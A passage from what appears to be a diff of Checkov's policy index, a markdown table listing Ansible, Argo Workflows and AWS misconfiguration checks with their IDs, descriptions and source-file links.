[YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 103 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 104 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 105 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 106 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 107 | CKV_ANSIBLE_5 | resource | [?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 108 | CKV_ANSIBLE_5 | resource | [?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 109 | CKV_ANSIBLE_5 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 110 | CKV_ANSIBLE_5 | resource | [].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 111 | CKV_ANSIBLE_5 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 112 | CKV_ANSIBLE_5 | resource | [].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 113 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 114 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 115 | CKV_ANSIBLE_5 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 116 | CKV_ANSIBLE_5 | resource | [].tasks[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 117 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 118 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 119 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 120 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 121 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 122 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 123 | CKV_ANSIBLE_6 | resource | [?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 124 | CKV_ANSIBLE_6 | resource | [?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 125 | CKV_ANSIBLE_6 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 126 | CKV_ANSIBLE_6 | resource | [].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 127 | CKV_ANSIBLE_6 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 128 | CKV_ANSIBLE_6 | resource | [].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 129 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 130 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 131 | CKV_ANSIBLE_6 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 132 | CKV_ANSIBLE_6 | resource | [].tasks[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 133 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 134 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 135 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 136 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 137 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 138 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 139 | CKV2_ANSIBLE_1 | resource | tasks.ansible.builtin.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | +| 140 | CKV2_ANSIBLE_1 | resource | tasks.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | +| 141 | CKV2_ANSIBLE_2 | resource | tasks.ansible.builtin.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | +| 142 | CKV2_ANSIBLE_2 | resource | tasks.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | +| 143 | CKV2_ANSIBLE_3 | resource | block | Ensure block is handling task errors properly | Ansible | [BlockErrorHandling.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/BlockErrorHandling.yaml) | +| 144 | CKV2_ANSIBLE_4 | resource | tasks.ansible.builtin.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | +| 145 | CKV2_ANSIBLE_4 | resource | tasks.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | +| 146 | CKV2_ANSIBLE_5 | resource | tasks.ansible.builtin.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | +| 147 | CKV2_ANSIBLE_5 | resource | tasks.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | +| 148 | CKV2_ANSIBLE_6 | resource | tasks.ansible.builtin.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | +| 149 | CKV2_ANSIBLE_6 | resource | tasks.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | +| 150 | CKV_ARGO_1 | argo_workflows | spec | Ensure Workflow pods are not using the default ServiceAccount | Argo Workflows | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/DefaultServiceAccount.py) | +| 151 | CKV_ARGO_2 | argo_workflows | spec | Ensure Workflow pods are running as non-root user | Argo Workflows | [RunAsNonRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/RunAsNonRoot.py) | +| 152 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | +| 153 | CKV_AWS_1 | resource | serverless_aws | Ensure IAM policies that allow full "*-*" administrative privileges are not created | serverless | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AdminPolicyDocument.py) | +| 154 | CKV_AWS_2 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure ALB protocol is HTTPS | Cloudformation | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py) | +| 155 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 156 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 157 | CKV_AWS_3 | resource | AWS::EC2::Volume | Ensure all data stored in the EBS is securely encrypted | Cloudformation | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EBSEncryption.py) | +| 158 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | +| 159 | CKV_AWS_5 | resource | AWS::Elasticsearch::Domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Cloudformation | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchEncryption.py) | +| 160 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 161 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 162 | CKV_AWS_6 | resource | AWS::Elasticsearch::Domain | Ensure all Elasticsearch has node-to-node encryption enabled | Cloudformation | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 163 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 164 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 165 | CKV_AWS_7 | resource | AWS::KMS::Key | Ensure rotation for customer created CMKs is enabled | Cloudformation | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSRotation.py) | +| 166 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | +| 167 | CKV_AWS_8 | resource | AWS::AutoScaling::LaunchConfiguration | Ensure all data stored in the Launch configuration EBS is securely encrypted | Cloudformation | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 168 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 169 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 170 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | +| 171 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | +| 172 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | +| 173 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | +| 174 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | +| 175 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | +| 176 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | +| 177 | CKV_AWS_16 | resource | AWS::RDS::DBInstance | Ensure all data stored in the RDS is securely encrypted at rest | Cloudformation | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEncryption.py) | +| 178 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | +| 179 | CKV_AWS_17 | resource | AWS::RDS::DBInstance | Ensure all data stored in RDS is not publicly accessible | Cloudformation | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSPubliclyAccessible.py) | +| 180 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 181 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 182 | CKV_AWS_18 | resource | AWS::S3::Bucket | Ensure the S3 bucket has access logging enabled | Cloudformation | [S3AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3AccessLogs.py) | +| 183 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | +| 184 | CKV_AWS_19 | resource | AWS::S3::Bucket | Ensure the S3 bucket has server-side-encryption enabled | Cloudformation | [S3Encryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Encryption.py) | +| 185 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | +| 186 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | +| 187 | CKV_AWS_20 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow READ permissions to everyone | Cloudformation | [S3PublicACLRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLRead.py) | +| 188 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | +| 189 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | +| 190 | CKV_AWS_21 | resource | AWS::S3::Bucket | Ensure the S3 bucket has versioning enabled | Cloudformation | [S3Versioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Versioning.py) | +| 191 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | +| 192 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | +| 193 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) | +| 194 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroup | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 195 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupEgress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 196 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupIngress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 197 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 198 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 199 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 200 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 201 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 202 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 203 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 204 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 205 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 206 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 207 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 208 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 209 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 210 | CKV_AWS_25 | resource | 